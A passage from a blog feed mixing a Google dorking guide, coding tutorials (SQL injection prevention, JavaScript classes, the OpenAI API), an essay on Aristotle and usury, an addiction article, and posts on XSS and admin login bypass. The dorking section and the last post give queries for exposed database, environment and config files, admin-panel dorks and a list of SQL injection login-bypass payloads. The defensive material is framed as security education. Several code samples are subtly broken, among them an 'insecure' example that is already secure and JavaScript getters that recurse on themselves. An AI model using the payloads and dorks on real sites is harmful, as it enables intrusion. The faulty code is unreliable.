This operator is ideal for finding data within a specified number range.

Example:
numrange:2000-2020 "tech trends"
Results will show tech trend data from the specified years.

`daterange:` – Search by Date Range

The daterange: operator narrows down results to content published within a specific period.

Example:
daterange:2459000-2459100 "new technology"
Here, the numbers represent Julian dates.

Search for Groups and Authors: `group:` and `author:` Operators

These operators are useful for accessing Google Groups and finding content from specific authors.

**group:** – Search for discussions within a group
**author:** – Locate posts from a particular author

Example:
group:"SEO strategies"
This query finds discussions within groups about SEO strategies.

5. Boolean Operators: +, -, and OR

Boolean operators refine searches by forcing inclusions, excluding terms, or creating optional searches.

`+` Operator – Force Inclusion

Use this when you want a specific common term to be included in the results.

Example:
SEO +Google

`-` Operator – Exclude Terms

This operator removes unwanted results.

Example:
SEO -advertising
It will show SEO content but exclude anything related to advertising.

`OR` Operator – Optional Keywords

This operator allows you to search for multiple terms.

Example:
"SEO strategy" OR "SEO plan"
This query returns results containing either phrase.

6. Wildcard Operators: `*` and `.`

Wildcard operators are used to fill in unknown terms or single-character placeholders in your search.

`*` – Replace Any Word

This is useful when you’re unsure about certain words in a phrase.

Example:
"best * tools for SEO"
It finds all variations of the phrase, such as "best free tools for SEO" or "best online tools for SEO".

`.` – Single-Character Wildcard

Use this to replace a single character in a search term.

Example:
gr.y
It will match results like "gray" or "grey".

7. System and Database File Operators

These operators target system files and databases, which are often sensitive.

**php** – PHP code files
**sql** – SQL database files
**sql** – SQLite database files
**env** – Environment configuration files
**log** – Log files with system information

Example:
filetype:sql "user database"
This query finds SQL files that contain user databases.

pdb, idb, cdb: — Search for Other Database Formats

These operators target specific file extensions related to databases:

Example:
filetype:pdb customers
This query may find .pdb (Program Database) files containing customer records.
Usage: Helps locate niche or less common databases that could contain sensitive data.

sis, odb: — Search for System and Internal Database Files

These formats are sometimes used in internal applications or mobile platforms. The sis format, for example, is used for Symbian OS packages.

Example:
filetype:sis application
This query could expose installation packages for old Symbian-based applications.
Usage: Useful for uncovering outdated or unused software components.

cfg, inf, cfm: — Configuration and Log File Searches

While the article touches on .log files, it omits these key configuration-related file types:

Example:
filetype:cfg settings
This may reveal configuration files exposing system settings.
Usage: Vital for penetration testers to discover exposed configurations.

idb: — iOS Device Backups and Application Data

The idb format can store iOS backup data or application-specific information, which may be accessible if left unsecured online.

Example:
filetype:idb "iPhone backup"
This query may return backup files containing sensitive mobile data.
Usage: Helps in security audits to ensure proper mobile device backup practices.

klm: — Search for Keyhole Markup Language Files

These files are used in mapping software, like Google Earth. If exposed, they could reveal sensitive geospatial data.

Example:
filetype:klm "confidential locations"
This query may uncover mapping files with sensitive information.
Usage: Useful for locating improperly shared geospatial data or maps.

8. Other Google Dorks

Here are some other operators along with explanations of how to use them.

link: Search for Pages Linking to a Specific URL

The link: operator shows pages that link to a specific webpage or domain. This can be used to analyze backlinks, making it helpful for SEO professionals.

Example:
link:example.com
This query will return pages that contain links pointing to example.com.
Usage: Useful for backlink analysis or identifying referring domains.

insubject: Search for Google Group Discussions by Subject

This operator allows you to search for posts within Google Groups where the discussion subject matches your query. It works similarly to intitle:, but specifically within groups.

Example:
insubject:"SEO tips"
This query will find all Google Group threads where the subject contains "SEO tips."
Usage: Ideal for researching public discussions about specific topics.

msgid: — Locate Google Group Posts by Message ID

The msgid: operator is very specific, used to find Google Group messages via their unique ID. It can be helpful if you have a particular message ID from an old discussion.

Example:
msgid:abc123xyz
This will show the exact post with the specified message ID.
Usage: Useful for revisiting archived messages or continuing previous discussions in public forums.

Conclusion

Google Dorking is an essential skill in SEO and cybersecurity. Mastering this operator allows you to perform web searches efficiently. However, keep in mind that there are many more Google Dorks that may not have been mentioned as Google’s search engine features are also constantly evolving. There are also many dorks prebuilt that many people in the community use to find vulnerabilities.

Reference

Photo by sarah b on Unsplash

https://dorksearch.com/

Prevent SQLi with Validators and Prepared Statements

Thu, 12 Sep 2024 08:39:41 GMT

SQL injection attacks remain one of the most prevalent and dangerous security vulnerabilities in web applications. These attacks allow malicious users to manipulate database queries, potentially compromising sensitive data or altering system functionality. This article discusses the methods to secure your web applications against such threats by incorporating input validation and prepared statements. Using Codey Confectionery, a simple web application as an example, we will demonstrate how these techniques can effectively protect your backend code from SQL injection attempts.

Theory

SQL injection occurs when an application dynamically constructs an SQL query using unsanitized or improperly validated user input. In the context of a web application, attackers exploit this vulnerability by injecting malicious SQL code into input fields, allowing them to manipulate queries in unintended ways. For instance, in the example of Codey Confectionery, an insecure SQL query like:

const validator = require('validator');

app.post('/track', (req, res) => {  
  if (validator.isInt(req.body.customerId)) {  
    db.all(  
      "SELECT * FROM Employee WHERE EmployeeId = $customerId",  
      { $customerId: req.body.customerId },  
      (err, rows) => {  
        if (rows) {  
          res.status(200);  
          res.json(rows);  
        } else {  
          res.status(200);  
          res.json({ message: "No employees" });  
        }  
      }  
    );  
  } else {  
    res.json({ message: "Invalid customer ID." });  
  }  
});

can be compromised by entering 1' OR '1' = '1, which would return all employee records instead of just one. To mitigate this risk, two essential techniques can be employed: input validation and prepared statements.

Input Validation: Ensuring that user input matches expected formats (e.g., integers for employee IDs) can help reduce vulnerabilities. In this case, using a validation library like validator can check if the input is a valid integer before proceeding with the query execution.
Prepared Statements: These allow user inputs to be safely incorporated into queries without directly embedding them, preventing SQL code injection. By separating query logic from user inputs through placeholders, malicious SQL input will be treated as data rather than executable code.

By implementing these techniques, you can create a secure backend that prevents attackers from manipulating your database through SQL injection.

Understanding the Vulnerability

Let’s begin by examining the core issue. Here’s a snippet from the app.js file of Codey Confectionery:

app.post('/track', (req, res) => {  
  db.all(  
    "SELECT * FROM Employee WHERE EmployeeId = $customerId",  
    { $customerId: req.body.customerId },  
    (err, rows) => {  
      if (rows) {  
        res.status(200);  
        res.json(rows);  
      } else {  
        res.status(200);  
        res.json({ message: "No employees" });  
      }  
    }  
  );   
});

This code retrieves employee data based on the EmployeeId from a web form. However, this is vulnerable to SQL injection. For example, a malicious user could submit 1' OR '1' = '1 into the form, tricking the database into returning all employee records.

Step 1: Adding Input Validation

To prevent SQL injection, the first step is to ensure that the form input is valid. In this case, we expect the EmployeeId to be an integer. We can use the validator library to check if the input is indeed an integer before executing the SQL query.

First, install the validator package:

npm install validator

Then, add the following line at the top of your app.js file to require the validator:

const validator = require('validator');

Now, modify the /track route to validate the customerId before running the SQL query:

app.post('/track', (req, res) => {  
  if (validator.isInt(req.body.customerId)) {  
    // Proceed with query if valid integer  
  } else {  
    res.json({ message: "Invalid customer ID." });  
  }  
});

This change ensures that only valid integers are processed, blocking any non-numeric or malicious input that could be used for an SQL injection attack.

Step 2: Implementing Prepared Statements

Even with validation in place, it’s crucial to use prepared statements to prevent SQL injection attacks. Prepared statements allow you to safely pass user input into a query without directly embedding it into the SQL string, making it impossible for malicious users to alter your query logic.

Let’s refactor the SQL query to use a prepared statement:

db.all(  
  "SELECT * FROM Employee WHERE EmployeeId = $customerId",  
  {  
    $customerId: req.body.customerId  
  },  
  (err, rows) => {  
    if (rows) {  
      res.status(200);  
      res.json(rows);  
    } else {  
      res.status(200);  
      res.json({ message: "No employees" });  
    }  
  }  
);

In this query, $customerId is a placeholder for the actual customerId value. The value is safely injected into the query without the risk of SQL injection, thanks to the use of a prepared statement.

Full Secure Code

Here is the fully updated route code that includes both validation and prepared statements:

app.post('/track', (req, res) => {  
  if (validator.isInt(req.body.customerId)) {  
    db.all(  
      "SELECT * FROM Employee WHERE EmployeeId = $customerId",  
      {  
        $customerId: req.body.customerId  
      },  
      (err, rows) => {  
        if (rows) {  
          res.status(200);  
          res.json(rows);  
        } else {  
          res.status(200);  
          res.json({ message: "No employees" });  
        }  
      }  
    );  
  } else {  
    res.json({ message: "Invalid customer ID." });  
  }  
});

Testing the Solution

After implementing these changes, test the application by submitting invalid data and SQL injection attempts. For example:

Try submitting a non-integer value, such as "abc". You should receive an error message: Invalid customer ID.
Attempt an SQL injection with "1' OR '1' = '1". The query will no longer be vulnerable, and no sensitive data will be exposed.

Conclusion

By adding input validation and using prepared statements, you can significantly reduce the risk of SQL injection attacks. These are essential steps in securing your backend code and ensuring that user input is properly sanitized before interacting with your database.

With these changes, Codey Confectionery is now protected from SQL injection vulnerabilities. Make sure to apply these best practices to all user input fields in your application to keep it secure.

Thanks to: Codecademy

Building a Digital Library with JavaScript

Tue, 03 Sep 2024 07:28:56 GMT

Creating a digital library using JavaScript offers an excellent way to practice object-oriented programming and understand the principles of classes and inheritance. In this guide, we will build a versatile library system that manages books, movies, and CDs, allowing you to enhance your JavaScript skills while constructing a dynamic, extensible application.

To create a digital library, we need to build three main classes: Book, Movie, and CD. Each of these classes will share common properties and methods, which we will define using a parent class called Media. Let's go through the steps to build this library step-by-step.

Step 1: Define the `Media` Class

We start by creating an empty class named Media, which will serve as the base class for Book, Movie, and CD.

class Media {  
  // Empty class body  
}

Step 2: Add a Constructor to the `Media` Class

Next, add a constructor to the Media class that accepts one parameter, title. This will initialize shared properties for the child classes.

class Media {  
  constructor(title) {  
    this.title = title;  
    this.isCheckedOut = false;  
    this.ratings = [];  
  }  
}

Step 3: Add Getters for `Media` Properties

We need to create getter methods for the title, isCheckedOut, and ratings properties to make them accessible.

class Media {  
  constructor(title) {  
    this.title = title;  
    this.isCheckedOut = false;  
    this.ratings = [];  
  }  
  
  get title() {  
    return this.title;  
  }  
  get isCheckedOut() {  
    return this.isCheckedOut;  
  }  
  get ratings() {  
    return this.ratings;  
  }  
}

Step 4: Add a Setter for `isCheckedOut`

We should also provide a setter for the isCheckedOut property to allow its value to be modified.

set isCheckedOut(value) {  
  this.isCheckedOut = value;  
}

Step 5: Create `Media` Methods

Add methods to Media for managing the isCheckedOut status, calculating the average rating, and adding new ratings.

toggleCheckOutStatus Method: This method toggles the value of isCheckedOut.

toggleCheckOutStatus() {  
  this.isCheckedOut = !this.isCheckedOut;  
}

getAverageRating Method: This method calculates the average of the ratings in the ratings array.

getAverageRating() {  
  const ratingsSum = this.ratings.reduce((currentSum, rating) => currentSum + rating, 0);  
  return ratingsSum / this.ratings.length;  
}

AddRating Method: This method adds a new rating to the ratings array.

addRating(rating) {  
  this.ratings.push(rating);  
}

Here is a full code view of the media class above:

class Media {  
  constructor(title) {  
    this.title = title;  
    this.isCheckedOut = false;  
    this.ratings = [];  
  }  
  
  get title() {  
    return this.title;  
  }  
  
  get isCheckedOut() {  
    return this.isCheckedOut;  
  }  
  
  get ratings() {  
    return this.ratings;  
  }  
  
  set isCheckedOut(value) {  
    this.isCheckedOut = value;  
  }  
  
  toggleCheckOutStatus() {  
    this.isCheckedOut = !this.isCheckedOut;  
  }  
  
  getAverageRating() {  
    const ratingsSum = this.ratings.reduce((currentSum, rating) => currentSum + rating, 0);  
    return ratingsSum / this.ratings.length;  
  }  
  
  addRating(rating) {  
    this.ratings.push(rating);  
  }  
}

Step 6: Create the `Book` Class

Now, create a Book class that extends the Media class, inheriting its properties and methods.

class Book extends Media {  
  constructor(author, title, pages) {  
    super(title);  
    this.author = author;  
    this.pages = pages;  
  }  
    
  get author() {  
    return this.author;  
  }  
  get pages() {  
    return this.pages;  
  }  
}

Step 7: Create the `Movie` Class

Similarly, create a Movie class that extends Media:

class Movie extends Media {  
  constructor(director, title, runTime) {  
    super(title);  
    this.director = director;  
    this.runTime = runTime;  
  }  
  
  get director() {  
    return this.director;  
  }  
  get runTime() {  
    return this.runTime;  
  }  
}

Step 8: Testing the `Book` Class

Let’s create an instance of the Book class and test its functionality.

const historyOfEverything = new Book('Bill Bryson', 'A Short History of Nearly Everything', 544);  
historyOfEverything.toggleCheckOutStatus();  
console.log(historyOfEverything.isCheckedOut); // Logs true  
  
historyOfEverything.addRating(4);  
historyOfEverything.addRating(5);  
historyOfEverything.addRating(5);  
console.log(historyOfEverything.getAverageRating()); // Logs 4.67

Step 9: Testing the `Movie` Class

Next, create an instance of the `Movie` class and test its methods.

const speed = new Movie('Jan de Bont', 'Speed', 116);  
speed.toggleCheckOutStatus();  
console.log(speed.isCheckedOut); // Logs true  
  
speed.addRating(1);  
speed.addRating(1);  
speed.addRating(5);  
console.log(speed.getAverageRating()); // Logs 2.33

Additional Challenges

To further enhance this digital library, consider implementing the following:

Add more properties: For example, add a movieCast property to Movie or a songTitles property to CD.
Create a CD class: Extend Media and include properties like artist, songs, etc.
Validate ratings: Ensure addRating() only accepts values between 1 and 5.
Implement a shuffle method: Create a shuffle method in the CD class to return a randomly sorted array of songs.
Create a Catalog class: This class could manage all Media items in the library.

These tasks will help you deepen your understanding of JavaScript classes and inheritance while enhancing the functionality of your digital library.

Thanks to: Codecademy

OpenAI JavaScript API: Building a Recipe Blog

Fri, 30 Aug 2024 09:12:07 GMT

In this project, we’ll build a recipe generator that provides tailored recipe recommendations by providing the model with context about our dietary preferences, ingredients on hand, and cuisine favorites. We’ll practice prompt engineering to format the model output recipes in the best format for our blog.

Let’s get cooking!

Start the project by importing the OpenAI class from the openai library.

import OpenAI from "openai";

Create a string variable named apiToken to store your OpenAI API key. Make sure this token is kept secure and never published to the public. To access the token you can create it on the following OpenAI page: https://platform.openai.com/settings/profile?tab=api-keys

const apiToken = 'your-openai-api-key';

Initializing the OpenAI Client with the API Token: When creating an instance of the OpenAI class, pass the API token as an option to authenticate your requests.

const client = new OpenAI({
apiKey: apiToken
});

Create an userProfile object, you can update the dietary restrictions, cuisine preferences, and ingredients to reflect Indonesian cuisine. Here is an example:

const userProfile = {
dietaryRestrictions: 'halal',
cuisinePreferences: 'Indonesian, Sundanese, Javanese',
ingredientsAvailable: 'tempeh, tofu, coconut milk, chili, lemongrass'
};

This object includes:

dietaryRestrictions set to 'halal'
cuisinePreferences set to 'Indonesian, Sundanese, Javanese'
ingredientsAvailable set to 'tempeh, tofu, coconut milk, chili, lemongrass'

Create an object called systemPrompt with the specified instructions for the AI, use the following syntax:

const systemPrompt = { role: 'system', content: 'Generate an HTML code for a recipe blog that considers dietary restrictions, cuisine type, and ingredients.'
};

Create a string variable named **userContent1** that begins the user prompt. This string should start with a sentence indicating your intention to create a recipe blog post. Then, proceed to include the relevant data from the **userProfile** object, making sure to specify what each piece of data from **userProfile** represents.

const userContent1 = I want to create a recipe blog post. Here are my dietary restrictions: ${userProfile.dietaryRestrictions}. My cuisine preferences include: ${userProfile.cuisinePreferences}. The ingredients I have available are: ${userProfile.ingredientsAvailable}.;

Construct a string called userContent2 that outlines the structure of a blog post, use the following syntax:

const userContent2 = Please provide a blog post with a title, description, ingredients, and instructions. Format the ingredients and instructions as follows: Ingredients should be bulleted, and instructions should be numbered.;

Construct a string named userContent3 that establishes certain limitations for the recipe creation, use the following syntax:

const userContent3 = The recipe must use only the listed ingredients and should result in a single blog post with instructions not exceeding six steps.;

Define an object named userPrompt that holds the instructions for the AI, use the following syntax:

const userPrompt = {
role: 'user',
content: ${userContent1}n${userContent2}n${userContent3}
};

This object includes the role key with the value "user" and the content key with the concatenated strings userContent1, userContent2, and userContent3, separated by newline characters for readability.

To initiate a chat completion using the client variable, follow these steps:

Use the client.chat.completions.create method.
Pass the model argument with the value "gpt-4o-mini" or "gpt-4o".
Pass the messages argument with an array containing systemPrompt and userPrompt.
Assign the return value to a variable called response.

Here’s the code:

const response = await client.chat.completions.create({
model: "gpt-4o",
messages: [systemPrompt, userPrompt]
});

To output the chat completion reply content to the terminal, use the following syntax:

console.log(response.choices[0].message.content);

This will print the content of the AI’s reply to the terminal. Make sure to place this line after the response variable has been assigned.

The result of this process should be HTML code that is prepared for review and can then be published on the website. Here is an example of the response result:

<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Halal Indonesian Tempeh and Tofu Curry</title>
    <style>
        body {
            font-family: Arial, sans-serif;
            margin: 0;
            padding: 20px;
            background-color: #f8f9fa;
        }
        .container {
            max-width: 800px;
            margin: auto;
            background-color: #fff;
            padding: 20px;
            box-shadow: 0 0 10px rgba(0, 0, 0, 0.1);
        }
        h1 {
            color: #343a40;
        }
        p {
            color: #6c757d;
        }
        ul, ol {
            color: #495057;
        }
    </style>
</head>
<body>
    <div class="container">
        <h1>Halal Indonesian Tempeh and Tofu Curry</h1>
        <p>This halal Indonesian tempeh and tofu curry is a delightful combination of Sundanese and Javanese flavors. This simple, yet delicious recipe incorporates tempeh, tofu, coconut milk, chili, and lemongrass to create a rich and flavorful dish perfect for any occasion.</p>

        <h2>Ingredients</h2>
        <ul>
            <li>200g tempeh, cut into cubes</li>
            <li>200g tofu, cut into cubes</li>
            <li>400ml coconut milk</li>
            <li>2 red chilies, finely chopped</li>
            <li>2 stalks of lemongrass, bruised and finely chopped</li>
            <li>Salt, to taste</li>
        </ul>

        <h2>Instructions</h2>
        <ol>
            <li>Heat a large pan over medium heat and add a small amount of oil.</li>
            <li>Add the tempeh and tofu cubes to the pan and fry until golden brown on all sides. Remove and set aside.</li>
            <li>In the same pan, add the finely chopped chili and lemongrass. Sauté for 2-3 minutes until fragrant.</li>
            <li>Pour in the coconut milk and bring the mixture to a gentle simmer.</li>
            <li>Return the fried tempeh and tofu to the pan, stirring to coat them in the coconut milk mixture. Simmer for another 10 minutes, allowing the flavors to meld together.</li>
            <li>Season with salt to taste and serve the curry hot with steamed rice or your favorite Indonesian side dishes. Enjoy!</li>
        </ol>
    </div>
</body>
</html>

To view the output of an HTML script, you can create an HTML file on your local computer and then open it in a browser or you can also use an online site to view the HTML results, such as https://html.onlineviewer.net

Here is a visual display of the HTML:

This tutorial showcases how to leverage the OpenAI JavaScript API to create a tailored recipe blog generator. By integrating dietary preferences, available ingredients, and specific cuisine choices into the model’s prompts, you can generate customized, blog-ready recipes with minimal effort. Through this project, we’ve demonstrated the power of prompt engineering and API interaction to build dynamic content that meets users’ needs, offering a scalable solution for personalized recipe creation on your blog.

Thanks to: Codecademy

Aristotles Critique of Usury & The Natural Order

Sun, 25 Aug 2024 02:54:18 GMT

In the modern era, the concept of charging interest on loans known as usury has become a standard aspect of financial systems worldwide. Banks, credit card companies, and lenders routinely charge interest as a means of generating profit. However, if we delve into the philosophical traditions of ancient Greece, we find a profound critique of this practice, particularly from one of history’s greatest thinkers: Aristotle. His views on usury offer a timeless reflection on the ethics of money, justice, and the natural order.

Aristotle’s Understanding of Money: A Means, Not an End

To understand Aristotle’s critique of usury, it’s essential to first grasp his conception of money and its role in society. Aristotle, writing in the 4th century BCE, approached the topic of money within the broader context of his philosophical exploration of nature, purpose, and ethics.

For Aristotle, money was a human invention, a tool created to facilitate exchange within a community. In his seminal work “Politics,” he explains that money’s primary function is to act as a medium of exchange an agreed-upon measure that allows people to trade goods and services more easily. Aristotle saw money as inherently valuable not because of what it is, but because of what it represents: a means to acquire the things necessary for life.

Unlike tangible goods such as food, livestock, or land, which have intrinsic value and can produce more of themselves (crops grow, animals reproduce), money is “sterile.” It cannot, by its nature, create more money. Aristotle emphasized that money is meant to be used, not to be accumulated for its own sake. When money is stockpiled or used to make more money, it becomes an end in itself rather than a means to an end. This, according to Aristotle, is a fundamental distortion of its natural purpose.

The Unnatural Practice of Usury

Aristotle’s concept of “natural” versus “unnatural” practices is central to his critique of usury. In his view, natural economic activities are those that align with the natural purposes of objects and contribute to human flourishing (eudaimonia). Farming, for instance, is natural because it produces food, which sustains life. Trade is natural because it enables people to obtain what they need by exchanging goods they have for goods they lack.

Usury, however, falls into the category of unnatural practices. When a person lends money and charges interest, they are using money to generate more money, without any productive activity occurring in between. Aristotle argues that this is contrary to the natural order because it attempts to make something (profit) from nothing (sterile money).

In his “Politics,” Aristotle writes, “Usury is most reasonably hated, because its gain comes from money itself, not from that for the sake of which money was invented. For money was intended to be used in exchange, but not to increase at interest.” This statement encapsulates his belief that usury is fundamentally unjust and contrary to the purpose for which money was created.

Justice and Fairness in Economic Transactions

Aristotle’s ethical framework is built around the concept of justice, which he defines as giving each person their due. Justice, in Aristotle’s view, is about maintaining balance and fairness in relationships, whether they be social, political, or economic.

In the context of economic transactions, Aristotle believed that justice required equality and reciprocity. A fair transaction is one where both parties benefit proportionally from the exchange. For example, when a farmer sells wheat to a baker, both parties benefit the farmer gains money, and the baker gains raw material to produce bread.

Usury, however, disrupts this balance. When a lender charges interest on a loan, they receive more than what they originally provided, creating an unequal exchange. The borrower, in turn, ends up paying back more than they borrowed, often leading to hardship or even ruin. Aristotle saw this as a violation of justice because it allows the lender to profit without contributing anything of value to the transaction.

Moreover, Aristotle was concerned about the social implications of usury. He believed that practices like usury, which concentrate wealth in the hands of a few, lead to economic inequalities that can destabilize society. In a just society, wealth should be distributed in a way that supports the common good, rather than being hoarded by a small elite at the expense of the many.

The Pursuit of Eudaimonia: Economic Activity and the Good Life

At the heart of Aristotle’s philosophy is the concept of eudaimonia, often translated as “flourishing” or “the good life.” For Aristotle, the ultimate goal of human life is to achieve eudaimonia a state of being that is realized through virtuous activity and the fulfillment of one’s potential.

Economic activity, in Aristotle’s view, should support this ultimate goal. The purpose of wealth and money is to provide the material conditions necessary for people to live well to have food, shelter, clothing, and the resources needed to participate in the life of the community. Economic practices should thus be oriented toward the common good and the well-being of all members of society.

Usury, by contrast, is seen as an obstacle to the achievement of eudaimonia. By prioritizing profit over human well-being, usury distorts the true purpose of economic activity. It encourages the accumulation of wealth for its own sake, rather than for the sake of living a good life. In Aristotle’s ethical framework, this is not only unnatural but also morally wrong.

Relevance of Aristotle’s Critique in the Modern World

While Aristotle wrote in a very different economic context, his critique of usury remains relevant today, particularly in discussions about the ethics of finance and wealth distribution. In a world where debt and interest payments dominate many people’s lives, Aristotle’s concerns about the justice and fairness of economic practices resonate with modern debates about income inequality, predatory lending, and the moral responsibilities of financial institutions.

Aristotle challenges us to reconsider the role of money in our lives and to question whether our economic systems truly serve the common good. His emphasis on justice, fairness, and the natural purposes of money provides a framework for evaluating the ethical dimensions of financial practices that, despite their ubiquity, may not always contribute to the well-being of individuals and society as a whole.

As we navigate the complexities of modern finance, Aristotle’s insights remind us that the pursuit of wealth should never come at the expense of justice and human flourishing. Instead, economic practices should be guided by a commitment to fairness, reciprocity, and the common good principles that lie at the heart of Aristotle’s philosophy and continue to hold profound relevance today.

Photo by Pepi Stojanovski on Unsplash

Comparison Between Edging and Relapse in Addiction

Wed, 31 Jul 2024 04:04:10 GMT

In the realm of addiction, two concepts frequently arise as significant topics: edging and relapse. Both terms, despite their differences, have destructive impacts. This article will explain the differences between edging and relapse and why both can be dangerous in the context of addiction.

Edging vs. Relapse: Definitions and Differences

To understand the differences between edging and relapse, we can use the following metaphor:

Edging: Standing at the edge of a cliff. This represents a situation where someone toys with temptation or urges without fully giving in.
Relapse: Falling into the abyss. This is when someone fully returns to addictive habits or behaviors after attempting to quit.

Many people believe it is better to be on the edge of the cliff as long as they don’t fall into it. They think that as long as they can control themselves, there is no harm in approaching temptation. However, there are several serious issues with this approach.

The Risks of Edging: Playing at the Edge of the Cliff

The main problem with edging is the feeling and the time spent. When we feel capable of controlling our desires, we often feel free to play at the edge of the cliff. The goal of approaching the cliff edge is the abyss itself. It’s just a matter of time before we actually fall.

This can cause more damage than simply falling into the abyss, as we lose so much time spent playing at the edge of the cliff. Edging makes us feel as though we still have control, when in fact, we are very close to relapse.

Avoiding Triggers: Key to Overcoming Edging and Relapse

Avoiding triggers is an effective strategy in overcoming addiction. Triggers are situations, emotions, or environments that push us back into addictive behavior. Here are some strategies to avoid triggers:

Identify Triggers: The first step is to recognize what our triggers are. Note the situations or feelings that bring about the urge for addiction.
Avoid Risky Situations: If we know that certain situations can trigger addictive behavior, avoid those situations as much as possible.
Manage Stress: Stress is one of the main triggers of addiction. Find healthy ways to manage stress, such as exercising or writing.
Build Social Support: Have a strong social support network. Friends, family, and a supportive environment can help us stay on the right track and avoid triggers.
Replace Negative Habits with Positive Ones: Look for activities that can replace addictive habits. For instance, if smoking is the habit to be broken, try replacing it with activities like exercising.

Regarding Desires: Between Feeling Strong and Being Strong

Desires become a problem when we feel capable of overcoming them, thus feeling it is okay to approach them. There is a difference between feeling strong and being strong:

Feeling Strong: Feeling capable of controlling urges, thus tending to play with temptation.
Being Strong: Striving to avoid urges as much as possible, consciously avoiding temptation.

In the context of addiction, it is important not only to feel strong but also to be strong by avoiding existing temptations. Being strong means acknowledging our weaknesses towards temptations and taking proactive steps to stay away from them.

Conclusion

Both edging and relapse have damaging impacts in the context of addiction. Edging, although seemingly safer, actually only delays the fall and prolongs suffering. Meanwhile, relapse is a full return to addictive behavior.

Enhancing Protection with Input Validation and Sanitization

Fri, 05 Jul 2024 09:37:25 GMT

In today’s digital age, web security has become a paramount concern for developers and webmasters alike. One of the notable cases in web security involves the methods of Contributor With JSO or XSS (index path), which exploit the functionalities of a website through the creation of user accounts that can then inject harmful scripts.

The Role of Contributors in Web Exploits

Contributors on a website typically have the ability to create their own accounts. Once an account is established, they can inject payloads using JSO (JavaScript Object) or XSS (Cross Site Scripting) techniques. This process not only undermines the integrity of the website but also poses significant security risks to users.

JavaScript Object (JSO)

JSO refers to a method where JavaScript is used to create complex interactions on web pages. It can be manipulated to execute unauthorized actions within a web application. An example of a JSO injection is shown below:

Here, an external JavaScript file is loaded into the web application, potentially leading to malicious activities.

Cross Site Scripting (XSS)

XSS stands for Cross Site Scripting. This type of attack involves injecting malicious scripts into web pages viewed by other users. The attacker inserts HTML or other client-side scripts into areas where web pages utilize user input, such as forms or URL parameters. This script then acts as if it is a part of the website, executing under the guise of the site’s own content.

For instance, an XSS attack could be as simple as:

<script>alert('XSS');</script>

This script would execute an alert box displaying “XSS” on the user’s screen, demonstrating the website’s vulnerability to script injection.

Index Path

The term “index path” typically refers to the file or directory access paths within a file system or server. In the context of web security, it implies the URL routes where specific files or resources can be accessed, which can be manipulated for malicious purposes. An example of an index path might involve direct references to file locations on the server, potentially exposing sensitive data.

Examples of XSS Attacks and Mitigations

XSS attacks can vary in complexity, from simple alerts to stealing cookies or session tokens. To mitigate these threats, web developers must employ input validation and sanitization techniques.

One practical example involves a simple web application created with Flask, a Python web framework:

from flask import Flask, request, escape

app = Flask(name)  
  
@app.route('/submitcomment', methods=['POST'])  
def submitcomment():  
    usercomment = request.form['comment']  
    # Input sanitization  
    safecomment = escape(usercomment)  
    # Save the sanitized comment  
    savecomment(safecomment)  
    return "Your comment has been safely stored!"  
  
def savecomment(comment):  
    # Function to save the comment to a database or file  
    pass  
  
if name == 'main':  
    app.run()

In this script, escape from the Flask module is used to sanitize input, which escapes harmful HTML characters, ensuring they are not executed as HTML or JavaScript when rendered on a web page.

Conclusion

Effective input validation and sanitization are essential for protecting web applications against attacks such as JavaScript Object (JSO) and Cross-Site Scripting (XSS). These security measures prevent malicious scripts from compromising user data and website integrity by ensuring only safe, properly formatted data is accepted and processed.

Thanks to: Ketapang Cyber Team

Mitigating Admin Login Bypass in Web Security

Tue, 02 Jul 2024 08:06:27 GMT

Before exploring the complexities of bypassing admin login mechanisms, it’s crucial to understand what “Admin Login Bypass” actually involves. This technique enables unauthorized access to the admin login page of a website, bypassing standard authentication procedures. This exposure can potentially allow malicious entities to access and modify admin pages, highlighting significant vulnerabilities.

The Importance of Robust Admin Login Security

The significance of secure admin logins cannot be overstated. Websites with weak authentication systems are prime targets for hackers. It is imperative for website owners to strengthen their admin logins to prevent unauthorized access, thereby protecting sensitive data and maintaining site integrity.

Connection to SQL Injection

Admin login bypass is closely associated with SQL Injection — a common security vulnerability that allows attackers to impersonate an admin through malformed SQL queries. For example, using a username and password combination like “admin” or “1=1” manipulates the SQL query, granting access without further exploitation.

Commonly Used SQL Queries for Bypass

In the realm of unauthorized access, certain SQL queries are notoriously used to bypass admin logins. Some of these include:

admin' #
admin' or '1' = '1
admin' or '1' = '1' #
admin 'or 1 = 1 or' '='
'or 1 = 1 limit 1 -- -+
' or '1' = '1
' or 'x' = 'x
' or 0 = 0 -
'or 0 = 0 #
' or 1 = 1 --
'or' one '=' one
'or 1 = 1 -- -'or'

Using DORKs and Payloads for Bypassing Admin Logins

To ethically test these vulnerabilities in controlled environments, here are some Google DORKs and payloads used to find and exploit weak login systems:

DORKs:

inurl:/admin/login.php site:il
inurl:/admin/login.php "administrator"
inurl:/cpanel/login.php
inurl:/cpanel/admin.php
inurl:/cpanel/

Payloads for Auth/Author Bypass:

' or 1=1 limit 1 -- -+
'="or'
admin
pass
pass123
1234
administrator
passwd

Mitigating the Bypass Vulnerability

To mitigate such vulnerabilities, enhancing script security in login systems is critical. A practical approach includes refining the PHP login script to employ more secure practices:

Original Code:

$username = $_POST["username"];  
$password = $_POST["password"];

Revised Code:

$username = mysqli_real_escape_string($conn, $_POST["username"]);  
$password = mysqli_real_escape_string($conn, $_POST["password"]);

Incorporating functions like mysqli_real_escape_string helps prevent SQL injection by escaping special characters in input strings, thus securing the login process against such exploits.

Beyond Simple Escaping: Strengthening Security with Advanced Techniques

While mysqli_real_escape_string is beneficial, employing prepared statements offers a more robust defense against SQL Injection. Prepared statements handle all escaping automatically and can improve performance with repeated query executions.

Example with Prepared Statements using MySQLi:

// Create database connection  
$conn = new mysqli($servername, $username, $password, $dbname);  
  
// Check connection  
if ($conn->connect_error) {  
    die("Connection failed: " . $conn->connect_error);  
}  
  
// Retrieve data from POST  
$username = $_POST["username"];  
$hashedPassword = password_hash($_POST["password"], PASSWORD_DEFAULT);  
  
// Prepare SQL statement  
$stmt = $conn->prepare("INSERT INTO users (username, password) VALUES (?, ?)");  
  
// Bind parameters to the statement  
$stmt->bind_param("ss", $username, $hashedPassword);  
  
// Execute statement  
$stmt->execute();  
  
// Close statement and connection  
$stmt->close();  
$conn->close();

This example demonstrates the security enhancements achieved by using prepared statements and hashing passwords, providing robust protection against SQL injection and securing user passwords effectively.

Conclusion

In conclusion, the security of admin login systems is paramount. By understanding the methods used for bypasses and employing more secure coding practices, web administrators can significantly reduce vulnerabilities and enhance the security posture of their sites.

